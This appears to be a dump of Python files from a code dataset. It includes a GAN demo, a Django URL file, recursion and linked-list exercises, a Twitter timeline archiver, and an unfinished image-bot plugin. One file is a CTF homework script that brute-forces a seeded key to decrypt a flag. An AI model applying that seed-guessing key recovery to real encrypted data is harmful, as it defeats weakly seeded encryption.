data, scalar = import_csv()\n tf.reset_default_graph()\n data_x = np.arange(0,4000,1,dtype=float).reshape(4000,1)\n data_y = np.arange(0,-4000,-1,dtype=float).reshape(4000,1)\n # scalar = MinMaxScaler(feature_range=(-1,1))\n # data = scalar.fit_transform(data.reshape(-1,1))\n # data_y = scalar.fit_transform(data_y.reshape(-1,1))\n\n data = np.concatenate([data_x, data_y], axis=1)\n\n X = tf.placeholder(tf.float32, [None, 2])\n Z = tf.placeholder(tf.float32, [None, 2])\n\n G_sample = generator(Z)\n r_logits, r_rep = discriminator(X)\n f_logits, g_rep = discriminator(G_sample, reuse=True)\n\n disc_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=r_logits, labels=tf.ones_like(r_logits)) +\n tf.nn.sigmoid_cross_entropy_with_logits(logits=f_logits, labels=tf.zeros_like(f_logits)))\n gen_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f_logits, labels=tf.ones_like(f_logits)))\n\n gen_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=\"GAN/Generator\")\n disc_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=\"GAN/Discriminator\")\n\n gen_step = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(gen_loss, var_list=gen_vars) # G Train step\n disc_step = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(disc_loss, var_list=disc_vars) # D Train step\n\n # sess = tf.Session(config=config)\n sess = tf.Session()\n tf.global_variables_initializer().run(session=sess)\n\n batch_size = 256\n nd_steps = 10\n ng_steps = 10\n\n gen_loss_arr = []\n disc_loss_arr = []\n\n for i in range(1000):\n start_num = int(np.random.uniform(0, 1) * len(data))\n if start_num > (len(data) - batch_size):\n start_num -= batch_size\n\n X_batch = get_next(data,start_num,batch_size)\n Z_batch = sample_Z(batch_size, 2)\n\n for _ in range(nd_steps):\n _, dloss = sess.run([disc_step, disc_loss], feed_dict={X: X_batch, Z: Z_batch})\n # rrep_dstep, grep_dstep = sess.run([r_rep, g_rep], feed_dict={X: X_batch, Z: Z_batch})\n\n for _ in range(ng_steps):\n _, gloss = sess.run([gen_step, gen_loss], feed_dict={Z: Z_batch})\n\n # rrep_gstep, grep_gstep = sess.run([r_rep, g_rep], feed_dict={X: X_batch, Z: Z_batch})\n\n # print(\"Iterations: %d\\t Discriminator loss: %.4f\\t Generator loss: %.4f\" % (i, dloss, gloss))\n gen_loss_arr.append(gloss)\n disc_loss_arr.append(dloss)\n if i % 100 == 0:\n print(\"Iterations: %d\\t Discriminator loss: %.4f\\t Generator loss: %.4f.\" % (i, dloss, gloss))\n answer = sess.run(G_sample, feed_dict={Z: Z_batch})\n ans_y = answer[:, 1]\n ans_x = answer[:, 0]\n # ans_y_re = scalar.inverse_transform(ans_y.reshape(-1, 1))\n # ans_x_re = scalar.inverse_transform(ans_x.reshape(-1, 1))\n plt.scatter(ans_x,ans_y)\n # plt.plot(np.reshape(answer,newshape=(batch_size,1)),color='r',label='Pred')\n # plt.plot(np.reshape(x_batch,newshape=(batch_size,1)),color='b',label='Actual')\n plt.title('Prediction Iter: {0}'.format(i))\n plt.savefig('./iteration_pred_{0}'.format(i))\n plt.close()\n\n plt.plot(disc_loss_arr, color='r', label='D')\n plt.plot(gen_loss_arr, color='b', label='G')\n plt.legend()\n plt.show()\n\n answer = []\n\n test_batch = sample_Z(batch_size, 2)\n # answer = sess.run(G_sample, feed_dict={Z: test_batch})\n # print(sess.run(f_logits,feed_dict={X: answer}))\n # print(sess.run(g_rep, feed_dict={Z: answer}))\n # plt.scatter(np.arange(0,len(answer),1),scalar.inverse_transform(answer).reshape(-1,1))\n answer = sess.run(G_sample, feed_dict={Z: Z_batch})\n ans_y = answer[:, 1]\n ans_x = answer[:, 0]\n # ans_y_re = scalar.inverse_transform(ans_y.reshape(-1, 1))\n # ans_x_re = scalar.inverse_transform(ans_x.reshape(-1, 1))\n plt.scatter(ans_x,ans_y)\n # plt.plot(scalar.inverse_transform(answer).reshape(-1,1))\n plt.show()\n\nif __name__ == '__main__':\n main()\n\n \"\"\"THEREFORE ADDING THE SECOND DIMENSION - X AXIS - LEADS TO A GOOD RESULT\"\"\"","sub_path":"Straight_Line_GAN.py","file_name":"Straight_Line_GAN.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579938044","text":"from django.urls import path\r\nfrom library_app import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('home/', views.home, name='home'),\r\n path('books/', views.BooksView.as_view(), name='books'),\r\n path('books//', views.BookDetail.as_view(), name='book-detail'),\r\n path('visitors/', views.VisitorsView.as_view(), name='visitors'),\r\n path('visitors//', views.VisitorDetail.as_view(), name='visitor-detail'),\r\n path('registrations/', views.RegistrationsView.as_view(), name='registrations'),\r\n path('registrations/add/', views.RegistrationCreate.as_view(), name='registration-add'),\r\n path('registrations/del//', views.RegistrationDelete.as_view(), name='registration-del'),\r\n path('registrations/upd//', views.RegistrationUpdate.as_view(), name='registration-upd'),\r\n path('registrations//', views.RegistrationDetail.as_view(), name='registration-detail'),\r\n]\r\n","sub_path":"Solutions/Task4/853502_Мария_Пугачёва/library_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"264648218","text":"import turtle\nwn = turtle.Screen()\nwn.title(\"Adoption Stoplight\")\nwn.bgcolor(\"black\")\n\n#Draw a box\npen = turtle.Turtle()\npen.color (\"yellow\")\npen.speed('fastest')\npen.width(3)\npen.hideturtle()\npen.penup()\npen.goto(-300,300)\npen.pendown()\npen.fd(240)\npen.rt(90)\npen.fd(560)\npen.rt(90)\npen.fd(240)\npen.rt(90)\npen.fd(560)\n\n\n#Red Light\n\nred_light= turtle.Turtle()\nred_light.shape(\"circle\")\nred_light.speed('fastest')\nred_light.shapesize(8,8,8)\nred_light.color(\"grey\")\nred_light.penup()\nred_light.goto(-180,200)\n\n#Yellow Light\nyellow_light= turtle.Turtle()\nyellow_light.shape(\"circle\")\nyellow_light.shapesize(8,8,8)\nyellow_light.speed('fastest')\nyellow_light.color(\"grey\")\nyellow_light.penup()\nyellow_light.goto(-180,20)\n\n#Green Light\ngreen_light= turtle.Turtle()\ngreen_light.shape(\"circle\")\ngreen_light.shapesize(8,8,8)\ngreen_light.speed('fastest')\ngreen_light.color(\"grey\")\ngreen_light.penup()\ngreen_light.goto(-180,-160)\n\n\n#About the animal\nscreen = turtle.Screen()\n\n\nanimal_name = screen.textinput(\"How Adoptable?\",\"What is the animal's name?\")\nanimal_type = screen.textinput(\"How Adoptable?\",\"Is the animal a cat or a dog?\")\nanimal_solid = screen.textinput(\"How Adoptable?\",\"Is this animal a solid color? (Yes or No)\")\nanimal_color = screen.textinput(\"How Adoptable?\",\"Does this animal have black on it? (Yes or No)\")\nanimal_age = int(screen.textinput(\"How Adoptable?\",\"What is the animal's age in months?\"))\n\npoints = 0\n\n#Cat\nif animal_type.lower() == \"cat\":\n#Special Breed\n cat_special = screen.textinput(\"How Adoptable?\",\"Is this a normal cat breed? (Yes or No)\")\n if cat_special.lower() == \"yes\":\n points = points + 1\n elif cat_special.lower() == \"no\":\n points = points - 2\n else:\n print(\"So sorry! I didn't get that\")\n#Cat colors\n if animal_solid.lower() == \"yes\":\n if animal_color.lower() == \"yes\":\n points = points + 3\n elif animal_color.lower() == \"no\":\n points = points - 1\n else:\n print(\"Sorry, something went wrong. Please try again.\")\n elif animal_solid.lower() == \"no\":\n if animal_color.lower() == \"yes\":\n points = points + 2\n elif animal_color.lower() == \"no\":\n points = points + 1\n else:\n print(\"Sorry, something went wrong. Try again.\")\n else: \n print(\"Sorry, I didn't get that\")\n#Cat Age\n if animal_age < 12:\n print(\"Green - this animal will have no problem getting adopted!\")\n elif animal_age >= 12 and animal_age < 36:\n points = points + 1\n elif animal_age >=36 and animal_age < 60:\n points = points + 2\n elif animal_age >= 60 and animal_age < 96:\n points = points + 3\n elif animal_age > 96:\n points = points + 4\n else:\n print(\"Sorry, something went wrong\")\n\n\n \n#Dog\nelif animal_type.lower() == \"dog\":\n bully_breed = screen.textinput(\"How Adoptable?\",\"Is this a bully breed dog? (Yes/No)\")\n#Dog breed\n if bully_breed.lower() == \"yes\":\n points = points + 3\n elif bully_breed.lower() == \"no\":\n toy_breed = screen.textinput(\"How Adoptable?\",\"Is this a toy breed dog?\")\n if toy_breed.lower() == \"yes\":\n points = points - 1\n elif toy_breed.lower() == \"no\":\n pass\n else:\n pass\n else:\n print(\"Sorry, I didn't get that. Please try again\")\n#Dog Colors\n if animal_solid.lower() == \"yes\":\n if animal_color.lower() == \"yes\":\n points = points + 3\n elif animal_color.lower() == \"no\":\n points = points - 1\n else:\n print(\"Sorry, something went wrong. Please try again.\")\n elif animal_solid.lower() == \"no\":\n if animal_color.lower() == \"yes\":\n points = points + 2\n elif animal_color.lower() == \"no\":\n points = points + 1\n else:\n print(\"Sorry, something went wrong. Try again.\")\n else: \n print(\"Sorry, I didn't get that\")\n#Dog Age\n if animal_age < 12:\n print(\"Green - this animal will have no problem getting adopted!\")\n elif animal_age >= 12 and animal_age < 36:\n points = points + 1\n elif animal_age >=36 and animal_age < 60:\n points = points + 2\n elif animal_age >= 60 and animal_age < 96:\n points = points + 3\n elif animal_age > 96:\n points = points + 4\n else:\n print(\"Sorry, something went wrong\")\n \n\n#Total Points\ntext_turtle= turtle.Turtle()\ntext_turtle.color(\"white\")\ntext_turtle.hideturtle()\nif animal_type.lower() == \"cat\" or \"dog\":\n if points < 4:\n green_light.color(\"green\")\n text_turtle.write(animal_name + \" will have no \\n problem being adopted!\", font=(\"Arial\",32,\"normal\"))\n elif points >= 4 and points < 6:\n yellow_light.color(\"yellow\")\n text_turtle.write(animal_name + \" may need some \\n help to be adopted\", font=(\"Arial\",32,\"normal\"))\n elif points >= 6:\n red_light.color(\"red\")\n text_turtle.write(animal_name + \" will definitely \\n need help being adopted \\n - consider discounting \\n adoption fee right away!\", font=(\"Arial\",32,\"normal\"))\n else:\n pass\nelse:\n pass\n\n\n\nwn.mainloop()\n","sub_path":"AdoptCalc.py","file_name":"AdoptCalc.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163657535","text":"from DoublyLinkedList import DoublyLinkedList\ndef copy_linked_list(lnk_lst):\n new = DoublyLinkedList()\n node=lnk_lst.first_node()\n while node != lnk_lst.trailer:\n new.add_last(node.data)\n node=node.next\n return new\n\ndef deep_copy_linked_list(lnk_lst):\n node=lnk_lst.first_node()\n def helper(lnk_lst,node):\n if node==lnk_lst.trailer:\n return DoublyLinkedList()\n else:\n new = helper(lnk_lst,node.next)\n if isinstance(node.data,DoublyLinkedList):\n new.add_first(helper(node.data,node.data.first_node()))\n else:\n new.add_first(node.data)\n return new\n return helper(lnk_lst,node)\ndef main():\n lnk_lst1=DoublyLinkedList()\n elem1=DoublyLinkedList()\n elem1.add_last(1)\n elem1.add_last(2)\n lnk_lst1.add_last(elem1)\n elem2=3\n lnk_lst1.add_last(elem2)\n lnk_lst2=deep_copy_linked_list(lnk_lst1)\n e1=lnk_lst1.first_node()\n e1_1=e1.data.first_node()\n e1_1.data=10\n e2=lnk_lst2.first_node()\n e2_1=e2.data.first_node()\n print(e2_1.data)\n\n","sub_path":"assignment/6/sl6728_hw6_q4.py","file_name":"sl6728_hw6_q4.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"267362104","text":"\r\n# RECURSION FUNCTION PROJECTS\r\ndef sum_to_one(n):\r\n result = 1\r\n call_stack = []\r\n\r\n while n != 1:\r\n execution_context = {\"n_value\": n}\r\n call_stack.append(execution_context)\r\n n -= 1\r\n print(call_stack)\r\n print(\"BASE CASE REACHED\")\r\n\r\n while len(call_stack) != 0:\r\n return_value = call_stack.pop()\r\n print(\"Return value of {0} adding to result {1}\".format(return_value['n_value'], result))\r\n result += return_value['n_value']\r\n return result, call_stack\r\n\r\n\r\n#sum_to_one(4)\r\n\r\n# Task 2\r\n\r\ndef sum_to_one(n):\r\n if n == 1:\r\n return n\r\n print(\"Recursing with input: {0}\".format(n))\r\n return n + sum_to_one(n - 1)\r\n\r\n#print(sum_to_one(7))\r\n\r\n# Task 3\r\n\r\ndef factorial(n):\r\n if n <= 1:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n\r\n#print(factorial(4))\r\n\r\n# Task 4 Producing subsets in powersets\r\n\r\ndef power_set(my_list):\r\n # base case: an empty list\r\n if len(my_list) == 0:\r\n return [[]]\r\n # recursive step: subsets without first element\r\n power_set_without_first = power_set(my_list[1:])\r\n # subsets with first element\r\n with_first = [[my_list[0]] + rest for rest in power_set_without_first]\r\n # return combination of the two\r\n return with_first + power_set_without_first\r\n\r\n\r\nuniversities = ['MIT', 'UCLA', 'Stanford', 'NYU']\r\npower_set_of_universities = power_set(universities)\r\n\r\n#for set in power_set_of_universities:\r\n# print(set)\r\n#print(power_set)\r\n\r\n# Task 5 - removing nested lists from lists , but keeping as a straight list\r\n\r\ndef flatten(my_list):\r\n result = []\r\n for el in my_list:\r\n if isinstance(el, list):\r\n print(\"list found!\")\r\n flat_list = flatten(el)\r\n result += flat_list\r\n else:\r\n result.append(el)\r\n return result\r\n\r\n\r\n### reserve for testing...\r\nplanets = ['mercury', 'venus', ['earth'], 'mars', [['jupiter', 'saturn']], 'uranus', ['neptune', 'pluto']]\r\n#print(flatten(planets))\r\n\r\n# Task 6\r\ndef fibonacci(n):\r\n if n == 1:\r\n return 1\r\n elif n == 0:\r\n return 0\r\n return fibonacci(n - 1) + fibonacci(n - 2)\r\n\r\n\r\n\r\n#print(fibonacci(5))\r\n# set the appropriate runtime:\r\n# 1, logN, N, N^2, 2^N, N!\r\nfibonacci_runtime = \"2^N\"\r\n#print(fibonacci_runtime)\r\n\r\n\r\n# Task 7\r\n\r\ndef factorial(n):\r\n result = 1\r\n while n != 0:\r\n result = result * n\r\n n -= 1\r\n return result\r\n\r\n\r\n# test cases\r\n#print(factorial(3))\r\n#print(factorial(0))\r\n#print(factorial(5))\r\n\r\n# Task 8\r\ndef fibonacci(n):\r\n if n < 0:\r\n ValueError(\"Input 0 or greater only!\")\r\n\r\n fibs = [0, 1]\r\n\r\n if n <= len(fibs) - 1:\r\n return fibs[n]\r\n\r\n while n > len(fibs) - 1:\r\n fibs.append(fibs[-1] + fibs[-2])\r\n\r\n return fibs[-1]\r\n\r\n\r\n# test cases\r\n#print(fibonacci(3) == 2)\r\n#print(fibonacci(7) == 13)\r\n#print(fibonacci(0))\r\n\r\n# Task 9\r\n\r\ndef find_min(my_list, min = None):\r\n if not my_list:\r\n return min\r\n\r\n if not min or my_list[0] < min:\r\n min = my_list[0]\r\n return find_min(my_list[1:], min)\r\n\r\n# test cases\r\n#print(find_min([42, 17, 2, -1, 67]) == -1)\r\n#print(find_min([]) == None)\r\n#print(find_min([13, 72, 19, 5, 86]) == 5)\r\n\r\n# Task 10\r\ndef is_palindrome(str):\r\n if len(str) < 2:\r\n return True\r\n if str[0] != str[-1]:\r\n return False\r\n return is_palindrome(str[1:-1])\r\n\r\n\r\n# test cases\r\n#print(is_palindrome(\"abba\") == True)\r\n#print(is_palindrome(\"abcba\") == False)\r\n\r\n# Task 11\r\ndef multiplication(num_a, num_b):\r\n if num_a == 0 or num_b == 0:\r\n return 0\r\n\r\n return num_a + multiplication(num_a, num_b - 1)\r\n\r\n# test cases\r\n#print(multiplication(3, 7) == 21)\r\n#print(multiplication(5, 5) == 25)\r\n#print(multiplication(0, 4) == 0)\r\n","sub_path":"Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242809535","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport time\nfrom contextlib import closing\nfrom logging import getLogger\nimport json\nimport requests\nimport tweepy\nfrom sqlalchemy.orm import load_only\nimport models\nfrom apis import api\nfrom databases import Session\n\n\nlogger = getLogger(__name__)\n\n\ndef int_or_None(s):\n if s is None:\n return None\n else:\n return int(s)\n\n\ndef download_media(rsession, media_urls, local_media_file):\n try:\n os.makedirs('media')\n except FileExistsError:\n pass\n filename = os.path.join('media', local_media_file)\n for (i, media_url) in enumerate(media_urls):\n with closing(rsession.get(media_url, stream=True)) as r:\n if r.status_code == 404:\n if i == len(media_urls) - 1:\n logger.warning(\n 'Media not found and giving up fetching: %s',\n media_url)\n continue\n r.raise_for_status()\n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=128):\n f.write(chunk)\n\n\ndef update_tweet_info(session, tw):\n entities = tw.entities.copy()\n if hasattr(tw, 'extended_entities'):\n for (k, v) in tw.extended_entities.items():\n entities[k] = v\n\n update_user_info(session, tw.user)\n if hasattr(tw, 'quoted_status'):\n quoted_status = tw.quoted_status\n if type(quoted_status) == dict:\n quoted_status = tweepy.Status.parse(api, quoted_status)\n update_tweet_info(session, quoted_status)\n if hasattr(tw, 'retweeted_status'):\n update_tweet_info(session, tw.retweeted_status)\n\n tw_db = session.query(models.Tweet)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(tw.id_str))\\\n .one_or_none()\n if tw_db is None:\n tw_db = models.Tweet(id=int(tw.id_str))\n session.add(tw_db)\n if tw.coordinates is not None:\n tw_db.coordinates_longitude = tw.coordinates['coordinates'][0]\n tw_db.coordinates_latitude = tw.coordinates['coordinates'][1]\n else:\n tw_db.coordinates_longitude = None\n tw_db.coordinates_latitude = None\n tw_db.created_at = tw.created_at\n if hasattr(tw, 'current_user_retweet'):\n tw_db.current_user_retweet = \\\n int_or_None(tw.current_user_retweet['id_str'])\n else:\n tw_db.current_user_retweet = None\n tw_db.favorite_count = tw.favorite_count\n tw_db.favorited = tw.favorited\n tw_db.filter_level = getattr(tw, 'filter_level', None)\n tw_db.in_reply_to_screen_name = tw.in_reply_to_screen_name\n tw_db.in_reply_to_status_id = int_or_None(tw.in_reply_to_status_id_str)\n tw_db.in_reply_to_user_id = int_or_None(tw.in_reply_to_user_id_str)\n tw_db.lang = tw.lang\n if hasattr(tw, 'place') and tw.place is not None:\n place = {}\n for k in ['attributes', 'country', 'code', 'country_code',\n 'full_name', 'id', 'name', 'place_type', 'url']:\n if hasattr(tw.place, k):\n place[k] = getattr(tw.place, k)\n place['bounding_box'] = {}\n place['bounding_box']['coordinates'] = \\\n tw.place.bounding_box.coordinates\n place['bounding_box']['type'] = \\\n tw.place.bounding_box.type\n tw_db.place = json.dumps(place)\n else:\n tw_db.place = None\n tw_db.possibly_sensitive = getattr(tw, 'possibly_sensitive', None)\n tw_db.quoted_status_id = \\\n int_or_None(getattr(tw, 'quoted_status_id_str', None))\n if hasattr(tw, 'scopes') and tw.scopes is not None:\n tw_db.scopes = json.dumps(tw.scopes)\n else:\n tw_db.scopes = None\n tw_db.retweet_count = tw.retweet_count\n tw_db.retweeted = tw.retweeted\n if hasattr(tw, 'retweeted_status'):\n tw_db.retweeted_status_id = int_or_None(tw.retweeted_status.id_str)\n else:\n tw_db.retweeted_status_id = None\n tw_db.source = tw.source\n tw_db.source_url = tw.source_url\n tw_db.text = tw.text\n tw_db.truncated = tw.truncated\n tw_db.user_id = int_or_None(tw.user.id_str)\n if hasattr(tw, 'withheld_copyright'):\n tw_db.withheld_copyright = tw.withheld_copyright\n else:\n tw_db.withheld_copyright = None\n if hasattr(tw, 'withheld_in_countries'):\n tw_db.withheld_in_countries = tw.withheld_in_countries\n else:\n tw_db.withheld_in_countries = None\n if hasattr(tw, 'withheld_scope'):\n tw_db.withheld_scope = tw.withheld_scope\n else:\n tw_db.withheld_scope = None\n session.commit()\n\n if not hasattr(tw, 'retweeted_status'):\n for m in entities.get('media', []):\n update_media_info(session, tw, m)\n for ht in entities.get('hashtags', []):\n tweet_id = int(tw.id_str)\n indices_begin = ht['indices'][0]\n indices_end = ht['indices'][1]\n ht_db = session.query(models.TweetHashtag)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if ht_db is None:\n ht_db = models.TweetHashtag(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(ht_db)\n ht_db.text = ht['text']\n session.commit()\n for url in entities.get('urls', []):\n tweet_id = int(tw.id_str)\n indices_begin = url['indices'][0]\n indices_end = url['indices'][1]\n url_db = session.query(models.TweetUrl)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if url_db is None:\n url_db = models.TweetUrl(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(url_db)\n url_db.url = url['url']\n url_db.display_url = url['display_url']\n url_db.expanded_url = url['expanded_url']\n session.commit()\n for sym in entities.get('symbols', []):\n tweet_id = int(tw.id_str)\n indices_begin = sym['indices'][0]\n indices_end = sym['indices'][1]\n sym_db = session.query(models.TweetSymbol)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if sym_db is None:\n sym_db = models.TweetSymbol(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(sym_db)\n sym_db.text = sym['text']\n session.commit()\n for um in entities.get('user_mentions', []):\n tweet_id = int(tw.id_str)\n indices_begin = um['indices'][0]\n indices_end = um['indices'][1]\n um_db = session.query(models.TweetUserMention)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if um_db is None:\n um_db = models.TweetUserMention(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(um_db)\n um_db.user_id = int(um['id_str'])\n um_db.screen_name = um['screen_name']\n um_db.name = um['name']\n session.commit()\n\n\ndef update_user_info(session, u):\n if hasattr(u, 'status') and u.status is not None:\n update_tweet_info(session, u.status)\n\n u_db = session.query(models.User)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(u.id_str))\\\n .one_or_none()\n if u_db is None:\n u_db = models.User(id=int(u.id_str))\n session.add(u_db)\n u_db.created_at = u.created_at\n u_db.default_profile = u.default_profile\n u_db.default_profile_image = u.default_profile_image\n u_db.description = u.description\n _entities = getattr(u, 'entities', None)\n u_db.entities = json.dumps(_entities) if _entities is not None else None\n u_db.favourites_count = u.favourites_count\n u_db.follow_request_sent = u.follow_request_sent\n u_db.followers_count = u.followers_count\n u_db.friends_count = u.friends_count\n u_db.geo_enabled = u.geo_enabled\n u_db.is_translator = u.is_translator\n u_db.lang = u.lang\n u_db.listed_count = u.listed_count\n u_db.location = u.location\n u_db.name = u.name\n u_db.profile_background_color = u.profile_background_color\n u_db.profile_background_image_url = u.profile_background_image_url\n u_db.profile_background_image_url_https = \\\n u.profile_background_image_url_https\n u_db.profile_background_tile = u.profile_background_tile\n u_db.profile_banner_url = getattr(u, 'profile_banner_url', None)\n u_db.profile_image_url = u.profile_image_url\n u_db.profile_image_url_https = u.profile_image_url_https\n u_db.profile_link_color = u.profile_link_color\n u_db.profile_sidebar_border_color = u.profile_sidebar_border_color\n u_db.profile_sidebar_fill_color = u.profile_sidebar_fill_color\n u_db.profile_text_color = u.profile_text_color\n u_db.profile_use_background_image = u.profile_use_background_image\n u_db.protected = u.protected\n u_db.screen_name = u.screen_name\n u_db.show_all_inline_media = getattr(u, 'show_all_inline_media', None)\n if hasattr(u, 'status') and u.status is not None:\n u_db.status_id = int_or_None(u.status.id_str)\n else:\n u_db.status_id = None\n u_db.statuses_count = u.statuses_count\n u_db.time_zone = u.time_zone\n u_db.url = u.url\n u_db.utc_offset = u.utc_offset\n u_db.verified = u.verified\n u_db.withheld_in_countries = getattr(u, 'withheld_in_countries', None)\n u_db.withheld_scope = getattr(u, 'withheld_scope', None)\n session.commit()\n\n\ndef update_media_info(session, tw, m):\n m_db = session.query(models.Media)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(m['id_str']))\\\n .one_or_none()\n if m_db is None:\n m_db = models.Media(id=int(m['id_str']))\n session.add(m_db)\n\n m_db.tweet_id = int(tw.id_str)\n m_db.media_url = m['media_url']\n m_db.media_url_https = m['media_url_https']\n m_db.url = m['url']\n m_db.display_url = m['display_url']\n m_db.expanded_url = m['expanded_url']\n m_db.sizes = json.dumps(m['sizes'])\n m_db.type = m['type']\n m_db.indices_begin = m['indices'][0]\n m_db.indices_end = m['indices'][1]\n if 'video_info' in m:\n m_db.video_info = json.dumps(m['video_info'])\n else:\n m_db.video_info = None\n\n m_db.locally_available = False\n m_db.locally_required = False\n session.commit()\n\n\ndef download_all_media(session):\n with requests.Session() as rsession:\n while True:\n media = session.query(models.Media)\\\n .options(load_only('media_url_https', 'video_info'))\\\n .filter_by(locally_required=True)\\\n .filter_by(locally_available=False)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n urls = [\n m.media_url_https + ':orig',\n m.media_url_https + ':large',\n m.media_url_https,\n ]\n try:\n download_media(rsession, urls, m.local_media_name)\n m.locally_available = True\n session.commit()\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during fetching media %s\",\n m.media_url_https)\n\n while True:\n media = session.query(models.Media)\\\n .options(load_only())\\\n .filter_by(locally_required=False)\\\n .filter_by(locally_available=True)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n try:\n filename = os.path.join('media', m.local_media_name)\n try:\n os.remove(filename)\n except FileNotFoundError as e:\n pass\n m.locally_available = False\n session.commit()\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during deleting media %s\",\n m.local_media_name)\n\n\ndef update_local_requirements():\n session = Session()\n while True:\n media = session.query(models.Media)\\\n .options(load_only())\\\n .filter_by(locally_required=None)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n m.locally_required = m.locally_available\n session.commit()\n\n\ndef main():\n session = Session()\n count = 200\n while True:\n try:\n tws = api.home_timeline(count=count)\n logger.info(\n \"got %d tweets from home timeline (count=%d)\",\n len(tws), count)\n for tw in tws:\n try:\n update_tweet_info(session, tw)\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during recording tweet %d\",\n tw.id)\n logger.info(\"Recorded tweets to db\")\n download_all_media(session)\n logger.info(\"Downloaded all media\")\n except Exception as e:\n session.rollback()\n logger.exception(\"Exception during fetching home timeline\")\n time.sleep(70)\n\n return 0\n","sub_path":"api_crawler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"455829050","text":"import random as rand\nfrom typing import List as list\n\n\ndef convert(data, size=4):\n return [int.from_bytes(data[index:index+size], 'big') for index in range(0, len(data), size)]\n\ndef Inverse(data, size=4):\n s = b''.join([d.to_bytes(size, 'big') for d in data])\n return b''.join([d.to_bytes(size, 'big') for d in data])\n\ndef _Decrypt(vector: list[int], key: list[int]):\n sum, delta, mask = 0x59D60180, 0xFACEB00C, 0xffffffff\n for 次數 in range(32):\n vector[1] = vector[1] - ((vector[0] << 4) + key[2] & mask ^ (vector[0] + sum) & mask ^ (vector[0] >> 5) + key[3] & mask) & mask\n vector[0] = vector[0] - ((vector[1] << 4) + key[0] & mask ^ (vector[1] + sum) & mask ^ (vector[1] >> 5) + key[1] & mask) & mask\n sum = sum - delta & mask\n return vector\n\ndef Decrypt(cipher: bytes, key: bytes):\n plain = b''\n for index in range(0, len(cipher), 8):\n plain += Inverse(_Decrypt(convert(cipher[index:index+8]), convert(key)))\n return plain\n\nif __name__ == '__main__':\n code = b'w\\xf9\\x05\\xc3\\x9e6\\xb5\\xeb\\r\\xee\\xcb\\xb4\\xeb\\x08\\xe8\\xcb'\n seed = 1600000000\n while seed > 0:\n rand.seed(seed)\n key = rand.getrandbits(128).to_bytes(16, 'big')\n flag = Decrypt(code, key)\n if flag[:4] == b'FLAG':\n print(flag.decode())\n break\n seed -= 1\n","sub_path":"HW0/4/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365589418","text":"import gc\nimport re\nfrom typing import Union\n\nfrom botoy import FriendMsg, GroupMsg, S\nfrom botoy import decorators as deco\n\nfrom .model import GetSetuConfig\nfrom .setu import Setu\n\n__doc__ = \"\"\"色图姬\"\"\"\n\nsetuPattern = \"来(.*?)[点丶、个份张幅](.*?)的?([rR]18)?[色瑟涩䔼😍🐍][图圖🤮]\"\ndigitalConversionDict = {\n \"一\": 1,\n \"二\": 2,\n \"两\": 2,\n \"三\": 3,\n \"四\": 4,\n \"五\": 5,\n \"六\": 6,\n \"七\": 7,\n \"八\": 8,\n \"九\": 9,\n \"十\": 10,\n}\n\n\ndef check_and_processing(ctx: Union[GroupMsg, FriendMsg]) -> Union[GetSetuConfig, None]:\n send = S.bind(ctx)\n info = ctx._match\n config = GetSetuConfig()\n if info[1] != \"\":\n if info[1] in digitalConversionDict.keys():\n 